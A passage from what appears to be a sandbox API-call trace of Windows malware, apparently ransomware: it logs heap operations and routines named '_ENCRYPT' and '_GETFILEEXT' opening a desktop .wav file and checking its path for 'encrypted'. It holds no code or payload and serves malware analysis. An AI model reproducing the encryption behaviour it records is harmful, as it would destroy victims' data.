hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.008] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.008] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.008] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.008] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.008] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.009] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.009] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.009] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kyfcsy7fw675g46j6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.009] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.010] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.010] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.011] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.011] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.011] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.011] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.012] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.012] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.012] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.012] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.012] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.012] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.012] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.012] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0xe91d5530, ftLastWriteTime.dwHighDateTime=0x1d5c009, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0x7c20c0 [0030.012] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.013] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0xe91d5530, ftLastWriteTime.dwHighDateTime=0x1d5c009, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0x7c20c0 [0030.013] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.013] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS 